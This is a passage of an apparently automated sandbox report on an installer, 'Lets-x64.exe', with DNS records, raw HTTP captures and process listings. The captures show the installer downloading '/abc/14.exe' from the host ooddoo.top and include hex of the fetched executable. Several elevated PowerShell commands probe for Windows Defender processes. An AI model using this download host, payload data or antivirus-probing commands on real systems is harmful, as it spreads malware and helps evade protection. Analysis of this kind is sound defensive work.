                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 29, 2024 16:09:06.154895067 CET1.1.1.1192.168.2.50xb79dNo error (0)prod.globalsign.map.fastly.net151.101.2.133A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 16:09:06.154895067 CET1.1.1.1192.168.2.50xb79dNo error (0)prod.globalsign.map.fastly.net151.101.130.133A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 16:09:06.154895067 CET1.1.1.1192.168.2.50xb79dNo error (0)prod.globalsign.map.fastly.net151.101.194.133A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 16:09:06.154895067 CET1.1.1.1192.168.2.50xb79dNo error (0)prod.globalsign.map.fastly.net151.101.66.133A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 16:09:25.425190926 CET1.1.1.1192.168.2.50x41d7No error (0)ooddoo.top104.21.81.224A (IP address)IN (0x0001)false
                                                                                                                  Dec 29, 2024 16:09:25.425190926 CET1.1.1.1192.168.2.50x41d7No error (0)ooddoo.top172.67.165.100A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • ooddoo.top

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549717104.21.81.22480320C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 29, 2024 16:09:25.551390886 CET188OUTGET /abc/14.exe HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Setup Factory 9.0
                                                                                                                  Host: ooddoo.top
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Dec 29, 2024 16:09:26.781719923 CET1013INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Sun, 29 Dec 2024 15:09:26 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 167
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: max-age=3600
                                                                                                                  Expires: Sun, 29 Dec 2024 16:09:26 GMT
                                                                                                                  Location: https://ooddoo.top/abc/14.exe
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBq8VuWrUff49eWpat6huqtceUIt4TCwzX62K164ba1%2B71peGnAU6BfkYSR6edeTR539VwYk5wy50Sdl6BD7UVqSvjhthrcQvXaSvZhfpj4aqhJCcCeiM%2BMzG5op"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f9ab6114a6a1861-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=188&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549720104.21.81.224443320C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-29 15:09:28 UTC139OUTGET /abc/14.exe HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Setup Factory 9.0
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Host: ooddoo.top
                                                                                                                  2024-12-29 15:09:29 UTC895INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 29 Dec 2024 15:09:29 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 2766808
                                                                                                                  Connection: close
                                                                                                                  Last-Modified: Sun, 29 Dec 2024 14:39:31 GMT
                                                                                                                  ETag: "b1187978ff59db1:0"
                                                                                                                  Cache-Control: max-age=14400
                                                                                                                  CF-Cache-Status: MISS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uo3wECML8t0JGBihlalW2tfgPU4KDWWQhKKJGOYNoasMej7oIbMjAPMk0vJOxvIWSzT2BmvFy49Mwwr%2FN6DoR0tKcn3zGuKixio4zIK9fH4RJNhBfzK7%2BatYa9Fc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f9ab61c9d7aef9d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1984&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=753&delivery_rate=1387173&cwnd=134&unsent_bytes=0&cid=9178ffa67decd7ce&ts=1380&x=0"
                                                                                                                  2024-12-29 15:09:29 UTC474INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY|zuYzuYwzuRich{u
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 4c cb 01 00 00 10 00 00 00 04 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 a0 d1 00 00 00 e0 01 00 00 62 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 68 1c 00 00 00 c0 02 00 00 04 00 00 00 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 81 21 00 00 00 e0 02 00 00 0e 00 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 2c 1b 00 00 00 10 03 00 00 18 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00
                                                                                                                  Data Ascii: L ` b@@ hj@ !n@@ ,|@B.idata
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: e2 a0 11 f8 65 5c c3 c2 24 c3 73 15 e0 29 f8 f8 fc 0f 47 82 ae df 4a 11 59 70 5a db 7e 81 ac 46 ea 99 12 d5 17 47 72 36 c1 93 0b 1e ee 74 79 93 12 e5 ac 95 c1 f3 82 4a da 32 72 1b 59 c7 94 80 1c e2 4a 1f 9c 91 01 e7 6c 3f 12 64 a4 20 fb 46 11 b3 9b 82 2f db 6d aa b2 ab ff c2 fe 67 b6 43 0c f7 e1 c9 57 71 8f cf 1f b2 af f2 6c 11 11 4b 6e 22 13 37 f5 fa 16 86 de a3 1c 8a 9e c4 50 7b 82 41 a7 fb 60 e7 ed f8 88 85 b7 4f e3 86 81 b9 58 76 c2 89 04 87 ff 4c 4c 17 a7 05 3b 27 b8 be 1f fb 00 3b c4 61 7d e7 82 9e 79 c2 9a 87 91 4b 02 c8 b6 fe 79 6c 27 c3 75 64 ec 47 2d f6 22 80 55 ab b1 5d 62 9b 28 85 f5 4a 7d b7 e9 75 73 6e 13 b6 19 fb dd b9 8b 9f 42 ec d5 a9 43 0e 44 72 c5 7a d1 c6 a5 d0 b7 d7 34 89 e3 58 fd e5 ab 45 9a 8f 95 49 d8 aa 7d 14 31 9f 7b c3 c5 3e 9b
                                                                                                                  Data Ascii: e\$s)GJYpZ~FGr6tyJ2rYJl?d F/mgCWqlKn"7P{A`OXvLL;';a}yKyl'udG-"U]b(J}usnBCDrz4XEI}1{>
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: ff e6 aa 50 ef 79 09 20 af 39 99 33 29 18 c3 d8 8c 34 87 39 7f a7 d7 f0 70 c4 ce d8 97 c7 2d 31 09 a2 da 4d a5 4e 39 3c b2 7b 23 cc 2d 1c 3c 82 ff 9e fe 7a 87 96 45 d7 5f 65 f5 ff 06 bb 08 ae bc 90 4f ce 1a 5e cf 6f a5 37 6d f8 f6 0b 7e dd 25 2a a4 57 b4 21 89 4e 31 e2 6b 10 5f ae 53 ce 8a 08 9c f6 e7 22 73 67 ce 52 9d 28 78 05 63 ba 67 1c 9e 31 2a ad 43 85 de bd fc 76 c0 51 81 fa ea 4b f3 16 86 49 99 34 61 b9 49 58 14 2f 86 3c 49 92 f3 17 6d 76 9b 0d 70 ef 50 7e 1e 68 c3 c4 04 bb f9 67 cb 30 c4 5f 60 53 23 8e fe 81 aa 16 8d bf fb 64 83 f7 50 95 ce 5c ff 9a 36 90 50 7f bc d9 8e 0a ff 88 9b 46 a8 10 b1 1c ab 38 46 be 81 a5 ca cf f7 ad 42 b1 cb af 9b 47 47 83 22 96 56 90 83 64 d0 13 f0 66 3b 93 f0 bc 47 b1 f3 1e f9 ab 4d ae 99 3f 72 28 b0 21 c6 6d 94 0b f2
                                                                                                                  Data Ascii: Py 93)49p-1MN9<{#-<zE_eO^o7m~%*W!N1k_S"sgR(xcg1*CvQKI4aIX/<ImvpP~hg0_`S#dP\6PF8FBGG"Vdf;GM?r(!m
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: a2 56 af 2a 88 81 6d 5f 38 e3 34 f6 1e 50 57 ae a0 0d e8 25 3e 2b c1 5e a3 75 b6 58 8c c4 5e 53 bd ef 55 ea d3 4f 6f 44 87 5d 8c db f4 ed 35 fa ab 37 dc 94 9f b5 be 13 a2 89 e7 2f 07 17 0d f0 2b bf 13 b5 7c 88 de e6 22 10 be 2b 18 fa 3b 0f 2f c6 e7 15 1b fd 61 ad b3 ca 16 ee bd c7 26 a3 5a 21 78 a5 03 e8 ed ba 9a 27 10 43 9e b7 15 20 c3 55 ce 50 ed 45 12 2f 37 b6 a1 19 d1 88 e4 b8 a4 48 e4 41 82 91 18 a3 68 bb 30 55 bf 1b 17 22 df 5e 76 ca 8c e0 a6 a4 8a e1 6d 5f 33 f5 30 1e a3 ee 23 85 1e cf 00 2a ef 2a 0c d0 78 ca 3b d5 26 7e bb 8f 2d c4 9a 7d 9f 62 47 a0 4d 4b 2b c7 d4 77 ab b0 df c8 bd 88 ac f9 cf 70 b6 32 9d a1 c1 b3 8a 5b b2 ee a6 6f 4c 89 26 89 03 aa bb 60 0c c1 a1 7e 27 3b 6e 3f 2f 49 96 64 cf 26 5b ce b8 c4 b8 f1 4a f3 65 45 5f 23 07 af 67 e3 fd
                                                                                                                  Data Ascii: V*m_84PW%>+^uX^SUOoD]57/+|"+;/a&Z!x'C UPE/7HAh0U"^vm_30#**x;&~-}bGMK+wp2[oL&`~';n?/Id&[JeE_#g
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: bd 9f a0 2c 65 e5 82 db 5c 6a 5e 7c 2d ec 35 53 8f 17 9c 71 08 b4 cb b2 e6 09 f0 2e a9 16 e1 ad 3b 00 79 bf 94 16 72 a4 ee f2 eb 92 69 19 14 ea ff 10 23 fb 12 b0 22 1f c7 80 15 0d f0 56 7c 5b 44 30 b9 b8 94 89 b5 13 63 7c 00 b5 fe 05 4b ea 8d 51 c3 44 6d 12 61 d6 cc 6d f6 89 4d 11 a8 a6 1d 43 a7 f3 66 5b 60 04 e6 f2 27 49 62 17 5d b1 9a cf 16 ff e6 cc 88 67 47 65 da ea d8 97 96 a3 db f2 9c 3a ee 55 f9 bd be de b6 dd 96 32 96 11 fa 8a 33 8b aa c4 d8 a1 8f 3b ac 9d 99 f2 98 f1 3d 9a 17 ba 8f cc b7 78 f7 51 eb e6 f2 e4 3b e3 34 24 e5 dd d6 17 c7 65 40 96 63 4f 04 86 f4 93 a0 4a 57 d7 03 a5 4e e3 38 e9 52 e0 c2 c6 00 f8 d0 1c 82 b4 c3 ce 85 ff 0d ea 54 46 80 ae e0 df 0e 2b 98 b4 30 d7 d5 50 8e f1 a8 58 e3 94 3c 3e a7 83 86 5a b4 0a f3 6f 8b e7 23 77 28 eb b7
                                                                                                                  Data Ascii: ,e\j^|-5Sq.;yri#"V|[D0c|KQDmamMCf[`'Ib]gGe:U23;=xQ;4$e@cOJWN8RTF+0PX<>Zo#w(
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: 7a ed 92 54 93 50 9f 8a e4 a9 96 6d 64 2f 67 c2 fb bb f3 f0 8a e6 b4 93 3e f2 c5 f0 89 72 65 a6 28 d9 ac 63 63 ae ee 31 c3 b4 a5 af c7 42 03 a9 a9 44 47 c7 a6 d0 a7 5f 24 a8 17 96 96 26 81 4a ef 98 62 48 43 53 67 4a 16 62 03 82 e5 a7 6d d0 f9 2f f6 45 29 d0 f4 11 65 6f f7 24 d6 c3 e8 c3 3d cf 1e d1 03 9a bf 39 79 ab ea 81 bc f2 57 2b f3 f9 29 84 32 23 7b e2 02 60 a3 35 57 de 74 0e 36 51 5b ca 54 6f f2 a2 c5 3a 52 d4 43 87 ea ea 77 13 d7 47 df 75 12 b8 7d a6 88 ba 66 45 54 c7 61 71 60 d0 cb 7f 4f c7 6b 2f ea ba 51 29 02 4f 3b 69 2d 90 3a 79 b7 ba 42 a7 9b 1f 24 ac fb f3 ee 62 57 65 54 4f 42 0a e7 7e 4a 12 7a bd 12 2b 06 42 bb b3 2e ac 1c 97 6e 6a 66 96 a7 bb 64 d7 4d 80 3c f5 1d a3 2d 95 09 3d 26 e3 7d 8a 87 5e ea b2 96 5f 52 75 c6 b4 4e 33 15 16 d6 f4 bc
                                                                                                                  Data Ascii: zTPmd/g>re(cc1BDG_$&JbHCSgJbm/E)eo$=9yW+)2#{`5Wt6Q[To:RCwGu}fETaq`Ok/Q)O;i-:yB$bWeTOB~Jz+B.njfdM<-=&}^_RuN3
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: a5 b6 9e 3f cd d6 38 9c 02 79 2b 38 eb 25 bd 54 ef 55 83 28 6f 67 c0 e5 71 04 34 4a 84 4a 42 fb b7 9b 9c 95 be 1e 93 2f 5e 53 ce 4a d7 c9 1b 21 7f 85 ac 95 ad 19 4a e2 04 f7 cf 76 af 87 5a 1f b3 8a f8 2f 22 6e 1e 35 67 93 6e 48 be af 8f 16 b3 f0 e6 3f 3c 8b e9 ae 83 d0 9f af 28 fa 59 62 43 ab cd 16 b2 a7 e0 01 2f f7 a3 bc 2e 92 e8 12 86 74 c0 3a af 2f 9f 6f d9 98 7c 47 83 7c c8 3f 7e 90 39 54 c7 16 dd 9c e7 69 89 8e b0 0c a2 ad 96 b9 41 af 73 53 e7 bb 77 67 ef 26 96 a3 d8 b8 0c a3 6b 45 0f 7f a0 12 73 ab 60 40 88 8a fc 96 e7 be a5 dd 67 e9 fe 2a 4f 7e f3 b1 c3 7c f4 2f 60 8f ee 5e 54 78 c6 ce 87 aa 63 f6 a4 bd a9 ea 77 8c 0f 05 96 46 ed ed e3 c9 87 07 92 8f 3f 7e 81 72 7c 1c f0 b3 8b 0a bd 98 50 6e 2e 45 ec d7 b9 54 1d a7 aa bf d7 d5 33 62 c1 ff 91 dd e3
                                                                                                                  Data Ascii: ?8y+8%TU(ogq4JJB/^SJ!JvZ/"n5gnH?<(YbC/.t:/o|G|?~9TiAsSwg&kEs`@g*O~|/`^TxcwF?~r|Pn.ET3b
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: b7 e8 0a 5f d3 3d f2 c8 6b 45 66 af 1d d4 b5 bf 91 80 12 9b 69 82 65 98 a6 8a 0f e4 51 8a 06 8d a4 6f a6 dc 42 56 7b 69 6f 31 5c 62 8d cc af e2 31 87 11 cb 0a c0 ea 17 83 41 0e aa a0 ce ed 06 24 c7 14 03 65 8a cf 33 4f 96 00 09 1f 30 01 e5 4e 85 3e 65 a9 db 5e f9 81 ca 4e 68 f3 d0 14 2c 66 d1 97 66 a7 94 09 c7 09 c2 ab ae e8 a1 21 57 be 93 6f 2f 20 c5 0a 86 17 4a 04 ef 70 84 e9 fd 5b a6 c1 15 92 a5 a9 19 0f 23 bf 79 d2 9d dd 00 cd 1e 34 f9 30 6a aa c4 29 9a 7d ab 4c e5 26 a2 98 8f ee 6e 8c fb b3 94 1b 0e 6b 75 f4 a5 2d a7 b8 c0 b6 e7 c5 33 86 b9 2f 10 a4 7d c7 ae 86 b6 61 bc 67 78 31 1c 5e 17 49 51 76 f6 a0 0c 71 73 c3 92 ab a4 89 ed 9c 0d 68 52 56 5f 00 ef ce 96 95 76 89 0e aa b9 15 70 b0 82 29 e8 a3 7c ee 68 4b 2b 15 0c d1 af 7d 85 a4 5b 0a 79 77 58 76
                                                                                                                  Data Ascii: _=kEfieQoBV{io1\b1A$e3O0N>e^Nh,ff!Wo/ Jp[#y40j)}L&nku-3/}agx1^IQvqshRV_vp)|hK+}[ywXv
                                                                                                                  2024-12-29 15:09:29 UTC1369INData Raw: 0b 90 84 87 3f a8 63 f3 8e 7d a1 48 3b ad 2c 46 82 e7 f2 fd 73 ac 9b 1b 0f 82 f7 55 d9 35 4e d5 84 93 8e 67 80 77 7c 33 87 57 fb a8 68 c7 99 e9 2c 2f 72 a1 52 e1 1c c0 c9 63 b5 8f 4a ce 5f ee de 5c f3 10 8d e0 34 4f 28 34 ce f0 80 bb cb bb 4e 19 35 ba d7 9e 32 bf cd 42 92 9d 4b 04 19 8e 6c ab 5b a8 9a 59 04 7b 3b 33 5a 60 8f 57 75 06 46 43 80 22 cb 77 5b 7b ca 49 b4 b4 85 5d 68 32 d0 e9 2a d2 29 12 79 2e 20 f3 96 32 76 8b 76 af c9 9f 11 07 67 86 62 15 cb 11 16 8a ed 13 3f 45 7e 4e 20 40 8b 56 f4 65 4d 6b 88 d3 ba 54 1b 37 dc 52 71 c8 42 5e 50 87 69 6c 61 06 c3 7d f7 4e 89 40 bb 66 35 a9 44 75 e2 2d c1 c0 12 84 a0 7d b8 57 98 6b be d0 1b 3e 80 d7 6e 01 f0 ff d3 07 f2 25 93 10 97 23 b7 4f 53 63 32 2e 90 ca ab 9a 59 24 a0 69 84 ee b8 a9 59 05 a7 6b 1f 41 31
                                                                                                                  Data Ascii: ?c}H;,FsU5Ngw|3Wh,/rRcJ_\4O(4N52BKl[Y{;3Z`WuFC"w[{I]h2*)y. 2vvgb?E~N @VeMkT7RqB^Pila}N@f5Du-}Wk>n%#OSc2.Y$iYkA1


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:10:09:08
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\Lets-x64.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Desktop\Lets-x64.exe"
                                                                                                                  Imagebase:0x7ff668850000
                                                                                                                  File size:21'353'869 bytes
                                                                                                                  MD5 hash:A702CC254B31FBC4A5EC45FA16573521
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:10:09:09
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
                                                                                                                  Imagebase:0x7ff68b8e0000
                                                                                                                  File size:5'153'280 bytes
                                                                                                                  MD5 hash:2A7D5F8D3FB4AB753B226FD88D31453B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:10:09:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:10:09:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:10:09:14
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                  Imagebase:0x7ff7ab390000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:10:09:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:10:09:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:10:09:18
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:10:09:18
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:10:09:19
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:10:09:19
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:10:09:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
